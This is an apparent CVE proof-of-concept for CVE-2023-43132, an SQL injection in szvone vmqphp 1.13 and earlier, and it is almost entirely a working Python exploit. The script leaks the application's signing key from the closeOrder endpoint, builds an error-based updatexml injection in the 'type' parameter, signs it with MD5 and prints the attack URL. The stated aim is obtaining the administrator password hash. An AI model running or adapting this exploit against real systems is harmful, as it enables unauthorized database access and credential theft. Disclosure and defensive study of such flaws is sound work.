Headline
CVE-2023-43132: test
szvone vmqphp <=1.13 is vulnerable to SQL Injection. Unauthorized remote users can use sql injection attacks to obtain the hash of the administrator password.
import requests
import re
import hashlib
import time
url = “http://127.0.0.1:887” # target ip
payload1 = “/index/index/closeOrder?orderId[123]=123”
res = requests.get(url = url + payload1)
r = re.findall(‘\’key\’ => \’<a class="toggle" title="(.*?)"\>’, res.text) # to get hash key
key = r[0]
print(key)
payId = ‘hello5’ # Enter any one
mytype = “1e0’-updatexml(1,concat(0x7e,user(),0x7e,version(),0x7e),3)-'1” #SQL statements injected with errors
price = ‘1100’ #It is best to write an integer of 100, and it cannot be repeated with the previous
byte_sign = (payId + mytype + price + key).encode(encoding=’utf-8’)
sign = hashlib.md5(byte_sign).hexdigest()
payload2 = "/createOrder?payId="+payId+"&type="+mytype+"&price="+price+"&sign="+sign
print(url+payload2) #Get the payload and access it directly in the browser